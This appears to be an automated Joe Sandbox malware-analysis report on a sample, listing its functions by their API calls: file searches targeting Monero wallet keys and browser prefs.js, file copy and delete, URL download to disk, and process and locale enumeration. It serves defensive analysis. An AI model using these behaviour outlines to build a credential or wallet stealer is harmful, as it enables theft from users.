Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: a8f4fdd4a41269c89651835d9fa2f718c6c9837c9e2bbebf3669071e8d7aa5a1
Instruction ID: b5cfb7fe95220b7486b933b468c914af5e9bc576d49a8229cb698dacd42630bf
Opcode Fuzzy Hash: a8f4fdd4a41269c89651835d9fa2f718c6c9837c9e2bbebf3669071e8d7aa5a1
Instruction Fuzzy Hash: E3B155719001089FDBA4FFA0DC55AEE737AAF55300F5085ADA40A9B181EF34AF49CF96

Function 006916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B510C,?,?,?,006B51B4,?,?,00000000,?,00000000), ref: 00691923
StrCmpCA.SHLWAPI(?,006B525C), ref: 00691973
StrCmpCA.SHLWAPI(?,006B5304), ref: 00691989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00691D40
DeleteFileA.KERNEL32(00000000), ref: 00691DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00691E20
FindClose.KERNEL32(000000FF), ref: 00691E32

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Strings

\*.*, xrefs: 006917F1

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 0cebca93ddcb5dfc76a54a9f43d49d35af2234b1580a33752a44e1c612e5a59b
Instruction ID: 4590a6f180c5d970f91ed2f9f884bf90e52b299b138b8368a9b92afdcafce5ed
Opcode Fuzzy Hash: 0cebca93ddcb5dfc76a54a9f43d49d35af2234b1580a33752a44e1c612e5a59b
Instruction Fuzzy Hash: BE122F719111189BCB99FBA0CC96AEE737EAF56300F40419EB10B66091EF346F89CF95

Function 0069DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B14B0,006B0C2A), ref: 0069DAEB
StrCmpCA.SHLWAPI(?,006B14B4), ref: 0069DB33
StrCmpCA.SHLWAPI(?,006B14B8), ref: 0069DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069DDCC
FindClose.KERNEL32(000000FF), ref: 0069DDDE

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: ac056e3f65cbf3429670c4760a08f43835579c5b9c1117b92b3c36f3c93ed61e
Instruction ID: 7bd7b2892b88e5096c86f20271a7a03531cb09ccee7981c95898d67505d543d7
Opcode Fuzzy Hash: ac056e3f65cbf3429670c4760a08f43835579c5b9c1117b92b3c36f3c93ed61e
Instruction Fuzzy Hash: 729131B69001049BCF94FBB0DC569EE737EAB85300F40866DA90A96581EF34DF09CF96

Function 006960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

InternetOpenA.WININET(006B0DF7,00000001,00000000,00000000,00000000), ref: 0069610F
StrCmpCA.SHLWAPI(?,0135E928), ref: 00696147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0069618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006961B3
InternetReadFile.WININET(?,?,00000400,?), ref: 006961DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0069620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00696249
InternetCloseHandle.WININET(?), ref: 00696253
InternetCloseHandle.WININET(00000000), ref: 00696260

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: bce8e0556d6a16bad0bb63c9715a0e09c44a67a88c104311b7458c497c9e8cbe
Instruction ID: 9c9f2e1b7c49c983b025533d297a3c2747b61fc9c8a7ca5558d9af88185fccec
Opcode Fuzzy Hash: bce8e0556d6a16bad0bb63c9715a0e09c44a67a88c104311b7458c497c9e8cbe
Instruction Fuzzy Hash: 54515FB1A00218ABDF24EFA0DC45BEE77B9FB44701F108199B605A71C0DB746E85CF95

Function 006A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
LocalFree.KERNEL32(00000000), ref: 006A7D22

Strings

/ , xrefs: 006A7C7F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
Instruction ID: 9afe05209da1bbacd802bf43d1a79a7ef6d73c84d75ad9bf90d54c034276e93c
Opcode Fuzzy Hash: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
Instruction Fuzzy Hash: A3417171941118AFDB64EB94DC99BEEB379FF45700F2042DAE40A62281DB342F85CFA5

Function 0069E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006B0D73), ref: 0069E4A2
StrCmpCA.SHLWAPI(?,006B14F8), ref: 0069E4F2
StrCmpCA.SHLWAPI(?,006B14FC), ref: 0069E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0069EBDF

Strings

\*.*, xrefs: 0069E44D

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 4f6a82ac0a893761ec21b29c02ac6374b4393dd57147f9f395a5dc4119ed7d8c
Instruction ID: 38c0b8f63df206bb7b8ff050dd7aabd0d5b3e96f3f6650938df74a4af5fc57a0
Opcode Fuzzy Hash: 4f6a82ac0a893761ec21b29c02ac6374b4393dd57147f9f395a5dc4119ed7d8c
Instruction Fuzzy Hash: 651283719101149BDB94FBA0DC96EEE733AAF55300F4041AEB50B96091EF34AF49CF96

Function 006A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006A961E
Process32First.KERNEL32(006B0ACA,00000128), ref: 006A9632
Process32Next.KERNEL32(006B0ACA,00000128), ref: 006A9647
StrCmpCA.SHLWAPI(?,00000000), ref: 006A965C
CloseHandle.KERNEL32(006B0ACA), ref: 006A967A

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
Instruction ID: cba2f04aa5a7267499c93763c473aff84a4c29dc20b44cc1cfa9abbc0be0f0c7
Opcode Fuzzy Hash: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
Instruction Fuzzy Hash: A0010C75A01208ABDB14DFA5CD48BEDB7F9FF49700F204299A905A6240DB749F40DF61

Function 006A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0135DF00,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
RtlAllocateHeap.NTDLL(00000000), ref: 006A7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0135DF00,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D
wsprintfA.USER32 ref: 006A7AB7

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
